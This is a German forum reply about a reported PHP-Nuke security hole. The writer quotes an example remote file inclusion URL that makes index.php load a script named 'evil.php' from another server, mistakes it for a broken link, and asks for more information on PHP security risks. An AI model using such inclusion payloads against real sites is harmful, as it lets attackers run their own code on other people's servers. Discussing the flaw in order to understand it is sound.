hm ....

In der Ausgabe 4 vom Linux-Magazin befindet sich auf Seite 24 ein Bericht, der ein massives Sicherheitsleck von PHP-Nuke aufdeckt.

Ich lese zwar hie und da auch mal as, was auf "echtem" Papier steht, hab aber diese Zeitschrift nicht und bin also auf deine links angewiesen

http://server-mit-php-nuke/index.php?file=http://eigener-server/evil.php

tstststs ... selbst wenn du http://server-mit-php-nuke/index.php?file=http://eigener-server/evil.php geschrieben hättest, wärs nicht besser ... "die Seite kann nicht angezeigt werden". Sowohl unter Windows wie von meiner FreeBSD-Maschine aus  -  oder ist meine DSL-Verbindung zu schnell dafür ?

Angegebener Link: http://online.securityfocus.com/bid/3889

der link ist zwar anklickbar, aber führt "nur" zu einer sehr ordentlichen informativen Adresse, an der ich allerdings nix gefunden habe, was deiner Problemstellung entspricht

Das obligatorische "ich hab's ja immer gesagt" und das Geplänkel über Sinn und vor allem Unsinn diverser PHP-Funktionen spare ich mir ;-)

eigentlich schade. Ich zum Beispiel weiß über die möglichen "Sicherheitsrisiken" bei PHP noch nicht genug und bin daher an jedem ernstzunehmenden Hinweis interessiert

Christoph S.